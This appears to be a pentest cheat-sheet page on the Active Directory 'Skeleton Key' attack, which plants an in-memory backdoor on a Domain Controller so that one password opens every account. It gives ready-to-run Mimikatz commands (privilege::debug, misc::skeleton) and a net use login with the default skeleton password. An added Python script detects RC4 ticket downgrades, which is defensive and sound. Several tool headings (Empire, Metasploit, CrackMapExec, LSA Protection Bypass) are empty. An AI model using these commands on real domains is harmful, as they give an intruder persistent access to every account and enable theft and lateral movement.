
🔥Skeleton Keys

Escalate privileges on a Domain using skeleton keys

Do Not play GOD without Permission!

• The Skeleton Key only works for Kerberos RC4 encryption.

• The Skeleton Key is a backdoor that runs in memory on the Domain Controller and allows a single password (the skeleton password) to be used to log on to any account.

• Because it runs in memory, it does not persist by itself (but can, of course, be scripted or persisted).
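
Because the Skeleton Key only works for Kerberos RC4, one defensive check is to look for accounts that normally receive AES tickets and are suddenly issued RC4 ones. The Python below is an added example, not part of the original page; the events are constructed, and it assumes exported Security events 4768/4769 with their `TicketEncryptionType` field in a domain where AES is the normal encryption type.

```python
# Added example: flag accounts whose Kerberos tickets drop from AES to RC4.
# Field names follow Windows Security events 4768/4769; all events below are constructed.
AES_TYPES = {"0x11", "0x12"}        # AES128-CTS, AES256-CTS
RC4_TYPE = "0x17"                   # RC4-HMAC
KERBEROS_EVENT_IDS = {4768, 4769}   # TGT request, service ticket request

def ev(event_id, time, user, etype, ip):
    """Build one constructed event record."""
    return {"EventID": event_id, "TimeCreated": time, "TargetUserName": user,
            "TicketEncryptionType": etype, "IpAddress": ip}

SAMPLE_EVENTS = [
    ev(4768, "2024-01-10T08:00:01Z", "alice", "0x12", "10.0.0.21"),
    ev(4768, "2024-01-10T08:01:00Z", "svc_legacy", "0x17", "10.0.0.40"),   # always RC4
    ev(4768, "2024-01-10T08:05:00Z", "bob", "0x12", "10.0.0.22"),
    ev(4768, "2024-01-10T08:06:00Z", "carol", "0xFFFFFFFF", "10.0.0.23"),  # failed request
    ev(4768, "2024-01-10T09:30:12Z", "alice", "0x17", "10.0.0.99"),
    ev(4769, "2024-01-10T09:31:40Z", "bob@CORP.EXAMPLE", "0x17", "10.0.0.99"),
    ev(4624, "2024-01-10T09:32:00Z", "bob", "-", "10.0.0.99"),  # not a Kerberos ticket event
]

def find_rc4_downgrades(events):
    """Return RC4 ticket events for accounts that were previously issued AES tickets."""
    seen_aes = set()
    findings = []
    for e in sorted(events, key=lambda x: x["TimeCreated"]):
        if e["EventID"] not in KERBEROS_EVENT_IDS:
            continue
        user = e["TargetUserName"].split("@")[0].lower()
        etype = e["TicketEncryptionType"].lower()
        if etype in AES_TYPES:
            seen_aes.add(user)
        elif etype == RC4_TYPE and user in seen_aes:
            findings.append({"user": user, "time": e["TimeCreated"],
                             "source": e["IpAddress"], "event_id": e["EventID"]})
    return findings

if __name__ == "__main__":
    for f in find_rc4_downgrades(SAMPLE_EVENTS):
        print(f"RC4 downgrade: {f['user']} at {f['time']} from {f['source']} (event {f['event_id']})")
```

An account that only ever requests RC4 (`svc_legacy` in the sample) is not flagged by this baseline, so RC4-only legacy accounts need a separate review.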

What is a Skeleton Key?

What permissions do I need to generate a Skeleton Key?

Domain Admin

Mimikatz

privilege::debug
misc::skeleton
net use p: \\WIN-MACHINE01\admin$ /user:rfs mimikatz

Run on Windows CMD

mimikatz.exe "privilege::debug" "misc::skeleton" exit

Empire


Metasploit


CrackMapExec


LSA Protection Bypass

Articles

Videos
